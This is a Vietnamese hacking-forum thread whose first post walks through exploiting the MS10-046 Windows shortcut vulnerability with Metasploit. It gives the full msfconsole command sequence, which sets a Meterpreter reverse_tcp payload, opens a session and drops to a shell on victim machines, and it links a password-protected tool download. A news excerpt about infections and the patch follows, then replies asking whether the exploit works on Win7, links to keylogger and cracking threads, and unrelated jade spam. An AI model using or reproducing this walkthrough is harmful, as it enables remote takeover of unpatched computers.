-
09-09-2011, 05:07 AM #1Junior Member
- Ngày tham gia
- Aug 2015
- Bài viết
- 0
Exploit - chiếm quyền điều khiển Window (MS10-046)
[FLASH]http://www.youtube.com/v/AUQ4wgHHYzQ[/FLASH]Tool :
[DOWNLOAD]http://www.mediafire.com/?2nu7rc8jwnhsbbr[/DOWNLOAD]
Pass : chiaseit.tk
Name: Metasploit (in Backtrack)
Version: 3.7 - 4.x
Home Page: http://www.metasploit.com/
Download Link: http://www.metasploit.com/download/
Network Setup:
Attackers IP: 192.168.1.35 (Linux - Backtrack)
Victim IP: 192.168.1.90 (XP - Win7 - Window server)
Gateway IP: 192.168.1.1
Command:
root@bt:~# msfconsole
msf > search lnk
msf > use windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(ms10_046_shortcut_icon_dllloader) > show payloads
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > show options
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.1.35
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.35
msf exploit(ms10_046_shortcut_icon_dllloader) > show options
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -l
msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1
meterpreter > sysinfo
meterpreter > help
meterpreter > shell
>> Hầu hết máy tính VN có nguy cơ nhiễm virus “Shortcut”
>> 30.800 máy tính nhiễm virus do lỗi Shortcut
>> Trojan tấn công vào lỗi nguy hiểm trong Windows
Microsoft lẫn các hãng bảo mật đều lên tiếng cảnh báo người dùng lẫn doanh nghiệp lưu ý mức độ nguy hiểm của lỗi này. Trung tâm an ninh mạng Bkis cho biết tính riêng tại Việt Nam đã có đến 30.800 máy tính bị nhiễm virus bắt nguồn từ lỗi "Shortcut". Cả Bkis và Sophos cùng phát hành công cụ ngăn ngừa và quét virus tạm thời trước khi có bản vá chính thức từ Microsoft.
Biểu đồ theo dõi tình hình “công phá” của các loại virus khai thác lỗi “Shortcut”
Lỗi nguy hiểm nằm trong các tập tin "shortcut" (định dạng *.Ink) của Windows, các tập tin này thường nằm ở giao diện desktop hay trình đơn Start. Bằng cách tạo ra một tập tin shortcut nhúng mã độc, tin tặc có thể tự động thực thi mã độc khi người dùng xem tập tin shortcut hay nội dung của một thư mục chứa tập tin shortcut nhúng mã độc.
Bản vá lỗi có chứa đựng phiên bản mới của tập tin Shell32.dll, đây là phần cập nhật quan trọng. Shell32.dll là một tập tin thư viện rất quan trọng trong Windows, nó chứa đựng một số hàm Windows Shell API. Nếu Shell32.dll bị lỗi hay cập nhật lỗi, máy tính sẽ có tình trạng "Màn hình xanh chết chóc" (Blue Screen of Death - BSOD).
Tuy nhiên, Microsoft không phát hành bản vá cho Windows XP SP2 và Windows 2000 nó chỉ hỗ trợ cho các phiên bản của hệ điều hành Windows bao gồm: SP3, Vista, Windows 7, Server 2003, Server 2008 và Server 2008 R2.View more random threads:
- Cheat game đập kẹo của google
- [Tut] Giả mạo Certificates để lấy ID và Password (P1)
- Hướng Dẫn bẻ khóa mật khẩu truy cập OS
- Ardamax Keylogger 3.8.6+ Serial
- Garena Ultimate - Bỏ qua 5s,hiện ping,spam room chat,by pass garena,hack exp
- [Hot] Nhận tìm thuốc + CD key cho phần mềm đây
- Exploit - chiếm quyền điều khiển Window (MS10-046)
- [Tut] Hack Dcom 3G
- Chim giả 2 đầu 92KL cực mềm đưa cặp đôi đến bến bờ đê mê nhất
- Tìm phần mền game Speed Gear
-
09-09-2011, 06:18 PM #2Junior Member
- Ngày tham gia
- Aug 2015
- Bài viết
- 0
cho hỏi cái demo trên khai thác đc win7 ko vậy bạn.
-
09-09-2011, 08:34 PM #3Junior Member
- Ngày tham gia
- Aug 2015
- Bài viết
- 0
đc hay ko thì còn tùy vào OS nó có update lỗi đó chưa nữa ...
-
09-09-2011, 08:34 PM #4Junior Member
- Ngày tham gia
- Aug 2015
- Bài viết
- 0
đc hay ko thì còn tùy vào OS nó có update lỗi đó chưa nữa ...
-
09-10-2011, 02:26 AM #5Junior Member
- Ngày tham gia
- Aug 2015
- Bài viết
- 0
sao mình làm chẳng ra vậy
-
09-10-2011, 02:26 AM #6Junior Member
- Ngày tham gia
- Dec 2015
- Bài viết
- 0
sao mình làm chẳng ra vậy
-
09-10-2011, 03:28 AM #7Junior Member
- Ngày tham gia
- Aug 2015
- Bài viết
- 0
Bạn xem đã làm theo hướng dẫn chưa ?
-
09-10-2011, 03:28 AM #8Junior Member
- Ngày tham gia
- Aug 2015
- Bài viết
- 0
Bạn xem đã làm theo hướng dẫn chưa ?
-
09-10-2011, 03:38 AM #9Junior Member
- Ngày tham gia
- Nov 2015
- Bài viết
- 0
Gửi bởi mnewbie
2) Níu OS nó đã update thì sẽ ko có kết nối đc thiết lập giữa máy victim và attacker đâu
-
09-10-2011, 03:38 AM #10Junior Member
- Ngày tham gia
- Aug 2015
- Bài viết
- 5
Gửi bởi mnewbie
2) Níu OS nó đã update thì sẽ ko có kết nối đc thiết lập giữa máy victim và attacker đâu
Các Chủ đề tương tự
-
[Thủ Thuật] Chiếm quyền quản trị Win 8, Chiếm quyền Administrator bằng Win 8
Bởi bevoll trong diễn đàn Thủ thuật - Hướng dẫn phần mềmTrả lời: 0Bài viết cuối: 12-12-2015, 08:52 PM -
Ứng dụng Wear Android cho phép bạn điều khiển máy tính chỉ bằng 1 chiếc đồng hồ thông minh
Bởi minhdo1213 trong diễn đàn Tin tức công nghệTrả lời: 0Bài viết cuối: 12-24-2014, 03:59 AM -
ONG BAK Trilogy Collections 720p BluRay DTS x264 ~ Chiến Binh Quyền Thái ~ Tony Jaa
Bởi mrtho88hnn trong diễn đàn Hành động - Chiến tranhTrả lời: 0Bài viết cuối: 05-16-2013, 02:11 AM -
Advanced Tokens Manager 3.5 RC4 - Giải pháp sao lưu phục hồi bản quyền Window 8 và Office 2013
Bởi trungan69 trong diễn đàn System ToolsTrả lời: 0Bài viết cuối: 02-15-2013, 03:54 PM -
Advanced Tokens Manager 3.5 RC3 - Giải pháp sao lưu phục hồi bản quyền Window 8 và Office 2013
Bởi banhmysaigon trong diễn đàn System ToolsTrả lời: 0Bài viết cuối: 12-21-2012, 11:18 PM
Ngọc Bích xanh thực chất thuộc dòng đá cẩm thạch (jade). Và cẩm thạch là tên gọi chung của ngọc bích. Vì bản tính chúng thuộc dòng đá đa khoáng được hình thành từ chất Silicat dưới dạng dioxy. Ngọc...
Chia sẻ Vòng tay ngọc bích xanh là gì? (4) Có lợi ích gì cho sức khỏe